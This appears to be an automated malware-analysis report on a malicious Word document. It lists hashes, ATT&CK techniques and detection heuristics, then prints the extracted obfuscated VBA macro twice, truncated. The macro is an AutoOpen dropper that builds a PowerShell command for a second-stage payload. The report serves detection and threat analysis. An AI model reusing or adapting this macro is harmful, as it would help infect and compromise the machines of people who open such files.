Office (OLE) malware analysis — malicious · c4cfec24881b1f49

MALICIOUS

Office (OLE)

134.0 KB Created: 2018-02-12 19:22:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: 2515974862c828c7ccf6af0e19c96568 SHA-1: 00e42e24c7ef85b703f6243a57cad557917d2534 SHA-256: c4cfec24881b1f49b899467da256fa6e5218d4db1ba4d0c1630bc243bf97f2fe

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, a critical indicator of malicious activity, suggesting it's designed to execute arbitrary commands. The macro's obfuscated nature and the presence of the Shell() call strongly indicate it's a downloader for a second-stage payload. The ClamAV detection further confirms its malicious nature.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6447096-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6447096-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 27773 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	27773 bytes
SHA-256: `83cb99a363bd745193bff16c61f7256d42600065aec67df3e1582162c9dbd72a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "BfBhTlCKChZFpR" Sub AutoOpen() On Error Resume Next qYGOvCiJl = tswQ - Sgn(sJIsULYionrc) - (8488384 - Tan(1125608) / 5478276 - ChrW(qWzGr)) GHAjPqRWZ = KAjjJjuoNSq - Sgn(aDamDJu) - (527874 - Tan(4272490) / 9452459 - ChrW(wlCHL)) FUHLPDjbI = TcwiloBp - Sgn(wGdnHcWNNq) - (7165886 - Tan(9746025) / 1274802 - ChrW(ijsKfCWXw)) Application.Run "vlVqPWXcmTjQNu", PljXNASELpnrRA dhpRGoLVz = WLFchzisqSkXXM - Sgn(Nzs) - (5628409 - Tan(4258189) / 7416627 - ChrW(ZHzGR)) KQZBVoCkQ = HLLzKjENG - Sgn(dRspT) - (8541530 - Tan(5169051) / 1815108 - ChrW(lzcbhX)) cQRPiUckk = hRZccVusvotXk - Sgn(cNtXifijiZi) - (3040437 - Tan(7502206) / 9636300 - ChrW(pAhIzlaB)) End Sub Function PljXNASELpnrRA() On Error Resume Next aszSXpoEEw = GzWzJFBP - Sgn(nwktBhFvOjuz) - (2965115 - Tan(2846810) / 9205455 - ChrW(rcEPbt)) WEljczzX = SSwc - Sgn(FkzjZD) - (4469749 - Tan(1007875) / 7092848 - ChrW(VhITKF)) DqpmM = Yqlak - Sgn(dzzOtpR) - (5181835 - Tan(855143) / 928743 - ChrW(qdjLZMrqidGWH)) dfwpXBlb = ofnIZzkw + Mid(TdqTvZqCcjEtFl + "qhbLTNGEYKPYTBHar]50+[CHar]68),[STRING][CHa'+'r]96).rEpLAcVQQvPkKOuVl" + tKBVHXONPZoG, 15, 45) lTFMcrS = oWar - Sgn(KnLh) - (9713011 - Tan(2565982) / 934187 - ChrW(LNYzXNaK)) ruAQSU = ourjCjFubwDN - Sgn(zLiiTcHFT) - (2956932 - Tan(2184518) / 1117317 - ChrW(HcwHfIv)) LNJHGu = hjzZHHFmXPBJjN - Sgn(RouwD) - (7018467 - Tan(4188573) / 5889809 - ChrW(ajYdvUSuRf)) vsJVHonGk = jBGtFrnU + Mid(WmZodPT + "fGwaJiFopipajKZVidnu;OhMSSYZ+SYVAF+VAFZDSYZ+VAF+VAFSYZC =SYZ+SYZ OhuQbzcrWquBPj" + RcQcjVAwitj, 21, 47) VzCuMmizd = ajcqCzGrBwhifi - Sgn(BQZiVdsiOO) - (339199 - Tan(6312328) / 7094306 - ChrW(RFdOJllY)) bVbEPnzMQ = tDDFnzhwn - Sgn(fqw) - (7390266 - Tan(4492319) / 9589253 - ChrW(iFObAQV)) jqOfLTiB = jqETVwt - Sgn(njbSYEjjP) - (2745304 - Tan(5686538) / 1002345 - ChrW(VSFQoCfKBs)) sPPKVcqZMGE = fiJLUBTvA + Mid(wouPh + "XXFzIBqbz'SYZ+ SMS'+'YZ+SYZr1fzVAF+VAFSMrVAF+VAF + OSYZ+SYZhMNSSYZ+SYZB SYZ+SYZ+ V'+'AF+VAF(SMr.SYZ+SYZexSYZ+dZK+dZKSYZSSYZ+SYZMSYZ+VAF+VAFSYZr+SSYZ+'+'SYZMreSMrSYZ+VAF+VAFSYZ);dZK+dZKfor'+'dKjTlBwQbXbwXXXE" + lKsNMBT, 10, 182) uwTodKKavz = kvX - Sgn(ULMKlrZ) - (1380616 - Tan(5443737) / 7849395 - ChrW(ASBp)) NiIdBXLJ = iblMZvWSHwK - Sgn(zibqPzQCL) - (7815476 - Tan(3449757) / 7967376 - ChrW(GqzioRk)) fPHtskXXq = qZIKL - Sgn(YpuCojwHwNPkU) - (7225482 - Tan(7629398) / 4603417 - ChrW(JwrSFYkSfaSI)) OofoiXuuhh = imEGciSGmNJG + Mid(fwdYiMmmQkOXwD + "tVZMqFvzRvniLiVMDdZVA'+'F+VAFK+dZKfc in SYZ+SYZVAF+VAFOhSYZ+SdZK+dZKYZMSYZ+SYZADCX){try{OhSYZ+dZK+dZKVAF+VAFSVAF+VAFYZdGDVMYrbRAiElNtQBN" + uNSmnojmAZ, 18, 102) CRkqWUf = kJGdz - Sgn(ujjRtaHDjnSUN) - (7716005 - Tan(3322681) / 2877939 - ChrW(bvqUTRkcYwF)) oQVvh = TCu - Sgn(wqjWiEwKjSbBGF) - (5490493 - Tan(8759930) / 4124566 - ChrW(fiJZaRwoV)) URXFjibfiDz = CCNlXVOzhs - Sgn(Wzf) - (7706156 - Tan(232176) / 8196634 - ChrW(WSTLfsWMpZ)) CzoPs = SjEDrMQ + Mid(dIYwskSDwwW + "tiDCtLIus'+'aCEdZVAF+VAFKoE'+'mdZK,[chAR]92 -REPLaCedZKL6fdZK,[cVAF+V'+'AFhAR]124)qOS.( tM1vERbosE'+'PREFereNce.tOStRING()[1,3]+dGwZztiJZbJiPtp" + kzOTaTQ, 10, 120) iIcBiMJzcAt = piPRNmhWKw - Sgn(Elb) - (7900692 - Tan(9976343) / 474664 - ChrW(NdMoprM)) vWOpDiG = jGRGjbTF - Sgn(vwL) - (1710416 - Tan(4220819) / 224991 - ChrW(adZJ)) kdSaLklY = bVqUzAhTAt - Sgn(FqGbFDMZ) - (7231054 - Tan(6255089) / 4875125 - ChrW(DrMrcFNMRCqEk)) wdNYaArcDnl = SaqjRIdEp + Mid(kriLdWIid + "AAMCzwSToiGY'+'dZVAF+VAFK+dZKZtcSYZ+SY'+'Zh{VAF+VAFSYZ+SYZ}SYZVAF+VAF+SdVAF+VAFZK+dZKYZdZK+dZK}SYZ).rEpLAce(([CHar]49+[CHar]10VAF+VAF2+[CHarRDKNzXVjpNYVPdUofwiGOVKFMi" + ZaNSDKqWVOK, 12, 129) fXVtHA = qiQ - Sgn(wzvYqfluc) - (464088 - Tan(684029) / 8152975 - ChrW(QfqBInJzRhWNW)) WjvSimIq = CSMkXGp - Sgn(YFi) - (7387131 - Tan(1552892) / 8456953 - ChrW(fCKwlpXJAhqHi)) MZkuzGn = SYKUNibPSj - Sgn(GPHlXVfRElf) - (2309039 - Tan(323700 ... (truncated)

SHA-256: 83cb99a363bd745193bff16c61f7256d42600065aec67df3e1582162c9dbd72a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BfBhTlCKChZFpR"
Sub AutoOpen()
On Error Resume Next
qYGOvCiJl = tswQ - Sgn(sJIsULYionrc) - (8488384 - Tan(1125608) / 5478276 - ChrW(qWzGr))
GHAjPqRWZ = KAjjJjuoNSq - Sgn(aDamDJu) - (527874 - Tan(4272490) / 9452459 - ChrW(wlCHL))
FUHLPDjbI = TcwiloBp - Sgn(wGdnHcWNNq) - (7165886 - Tan(9746025) / 1274802 - ChrW(ijsKfCWXw))
Application.Run "vlVqPWXcmTjQNu", PljXNASELpnrRA
dhpRGoLVz = WLFchzisqSkXXM - Sgn(Nzs) - (5628409 - Tan(4258189) / 7416627 - ChrW(ZHzGR))
KQZBVoCkQ = HLLzKjENG - Sgn(dRspT) - (8541530 - Tan(5169051) / 1815108 - ChrW(lzcbhX))
cQRPiUckk = hRZccVusvotXk - Sgn(cNtXifijiZi) - (3040437 - Tan(7502206) / 9636300 - ChrW(pAhIzlaB))
End Sub
Function PljXNASELpnrRA()
On Error Resume Next
aszSXpoEEw = GzWzJFBP - Sgn(nwktBhFvOjuz) - (2965115 - Tan(2846810) / 9205455 - ChrW(rcEPbt))
WEljczzX = SSwc - Sgn(FkzjZD) - (4469749 - Tan(1007875) / 7092848 - ChrW(VhITKF))
DqpmM = Yqlak - Sgn(dzzOtpR) - (5181835 - Tan(855143) / 928743 - ChrW(qdjLZMrqidGWH))
dfwpXBlb = ofnIZzkw + Mid(TdqTvZqCcjEtFl + "qhbLTNGEYKPYTBHar]50+[CHar]68),[STRING][CHa'+'r]96).rEpLAcVQQvPkKOuVl" + tKBVHXONPZoG, 15, 45)
lTFMcrS = oWar - Sgn(KnLh) - (9713011 - Tan(2565982) / 934187 - ChrW(LNYzXNaK))
ruAQSU = ourjCjFubwDN - Sgn(zLiiTcHFT) - (2956932 - Tan(2184518) / 1117317 - ChrW(HcwHfIv))
LNJHGu = hjzZHHFmXPBJjN - Sgn(RouwD) - (7018467 - Tan(4188573) / 5889809 - ChrW(ajYdvUSuRf))
vsJVHonGk = jBGtFrnU + Mid(WmZodPT + "fGwaJiFopipajKZVidnu;OhMSSYZ+SYVAF+VAFZDSYZ+VAF+VAFSYZC =SYZ+SYZ OhuQbzcrWquBPj" + RcQcjVAwitj, 21, 47)
VzCuMmizd = ajcqCzGrBwhifi - Sgn(BQZiVdsiOO) - (339199 - Tan(6312328) / 7094306 - ChrW(RFdOJllY))
bVbEPnzMQ = tDDFnzhwn - Sgn(fqw) - (7390266 - Tan(4492319) / 9589253 - ChrW(iFObAQV))
jqOfLTiB = jqETVwt - Sgn(njbSYEjjP) - (2745304 - Tan(5686538) / 1002345 - ChrW(VSFQoCfKBs))
sPPKVcqZMGE = fiJLUBTvA + Mid(wouPh + "XXFzIBqbz'SYZ+ SMS'+'YZ+SYZr1fzVAF+VAFSMrVAF+VAF + OSYZ+SYZhMNSSYZ+SYZB SYZ+SYZ+ V'+'AF+VAF(SMr.SYZ+SYZexSYZ+dZK+dZKSYZSSYZ+SYZMSYZ+VAF+VAFSYZr+SSYZ+'+'SYZMreSMrSYZ+VAF+VAFSYZ);dZK+dZKfor'+'dKjTlBwQbXbwXXXE" + lKsNMBT, 10, 182)
uwTodKKavz = kvX - Sgn(ULMKlrZ) - (1380616 - Tan(5443737) / 7849395 - ChrW(ASBp))
NiIdBXLJ = iblMZvWSHwK - Sgn(zibqPzQCL) - (7815476 - Tan(3449757) / 7967376 - ChrW(GqzioRk))
fPHtskXXq = qZIKL - Sgn(YpuCojwHwNPkU) - (7225482 - Tan(7629398) / 4603417 - ChrW(JwrSFYkSfaSI))
OofoiXuuhh = imEGciSGmNJG + Mid(fwdYiMmmQkOXwD + "tVZMqFvzRvniLiVMDdZVA'+'F+VAFK+dZKfc in SYZ+SYZVAF+VAFOhSYZ+SdZK+dZKYZMSYZ+SYZADCX){try{OhSYZ+dZK+dZKVAF+VAFSVAF+VAFYZdGDVMYrbRAiElNtQBN" + uNSmnojmAZ, 18, 102)
CRkqWUf = kJGdz - Sgn(ujjRtaHDjnSUN) - (7716005 - Tan(3322681) / 2877939 - ChrW(bvqUTRkcYwF))
oQVvh = TCu - Sgn(wqjWiEwKjSbBGF) - (5490493 - Tan(8759930) / 4124566 - ChrW(fiJZaRwoV))
URXFjibfiDz = CCNlXVOzhs - Sgn(Wzf) - (7706156 - Tan(232176) / 8196634 - ChrW(WSTLfsWMpZ))
CzoPs = SjEDrMQ + Mid(dIYwskSDwwW + "tiDCtLIus'+'aCEdZVAF+VAFKoE'+'mdZK,[chAR]92 -REPLaCedZKL6fdZK,[cVAF+V'+'AFhAR]124)qOS.( tM1vERbosE'+'PREFereNce.tOStRING()[1,3]+dGwZztiJZbJiPtp" + kzOTaTQ, 10, 120)
iIcBiMJzcAt = piPRNmhWKw - Sgn(Elb) - (7900692 - Tan(9976343) / 474664 - ChrW(NdMoprM))
vWOpDiG = jGRGjbTF - Sgn(vwL) - (1710416 - Tan(4220819) / 224991 - ChrW(adZJ))
kdSaLklY = bVqUzAhTAt - Sgn(FqGbFDMZ) - (7231054 - Tan(6255089) / 4875125 - ChrW(DrMrcFNMRCqEk))
wdNYaArcDnl = SaqjRIdEp + Mid(kriLdWIid + "AAMCzwSToiGY'+'dZVAF+VAFK+dZKZtcSYZ+SY'+'Zh{VAF+VAFSYZ+SYZ}SYZVAF+VAF+SdVAF+VAFZK+dZKYZdZK+dZK}SYZ).rEpLAce(([CHar]49+[CHar]10VAF+VAF2+[CHarRDKNzXVjpNYVPdUofwiGOVKFMi" + ZaNSDKqWVOK, 12, 129)
fXVtHA = qiQ - Sgn(wzvYqfluc) - (464088 - Tan(684029) / 8152975 - ChrW(QfqBInJzRhWNW))
WjvSimIq = CSMkXGp - Sgn(YFi) - (7387131 - Tan(1552892) / 8456953 - ChrW(fCKwlpXJAhqHi))
MZkuzGn = SYKUNibPSj - Sgn(GPHlXVfRElf) - (2309039 - Tan(323700
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.